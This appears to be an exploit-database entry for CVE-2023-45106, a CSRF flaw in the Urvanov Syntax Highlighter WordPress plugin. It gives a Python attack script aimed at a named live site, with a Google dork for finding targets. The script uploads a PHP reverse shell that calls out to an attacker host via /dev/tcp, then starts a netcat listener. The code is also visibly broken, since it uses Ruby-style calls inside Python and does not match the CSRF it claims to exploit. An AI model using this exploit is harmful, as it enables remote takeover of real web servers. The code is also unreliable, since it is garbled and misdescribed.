Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

2023.10.31

E1.CODERS (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2023-45106

CWE: CWE-352

Dork: site:adroom.ir inurl:/wp-admin/admin-ajax.php

import requests
import os
import time

# The target URL where the Urvanov Syntax Highlighter plugin is installed
url = 'http://www.adroom.ir/wp-admin/admin-ajax.php'

# Your PHP shell payload
payload = '''
<?php
exec('/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1\'');
?>
'''

# Your attacker IP and port
attacker_ip = 'ATTACKER_IP'
attacker_port = ATTACKER_PORT

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-Requested-With': 'XMLHttpRequest'
}

# Sending the exploit
for i in range(1, 1000):
    data = {
        'action': 'highlight_shortcode_editor_blocks',
        'code': f'<pre>${i.to_s().rjust(4, "0")}.{payload}}</pre>'
    }

    response = requests.post(url, headers=headers, data=data)
    print(f'Attempt {i}: {response.text}')

    if response.text == 'ok':
        print(f'Shell uploaded at: {i.to_s().rjust(4, "0")}.php')
        break

# Set up a listener on your attacker machine to catch the reverse shell
os.system(f'nc -lvp {attacker_port}')

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

Dork: site:adroom.ir inurl:/wp-admin/admin-ajax.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.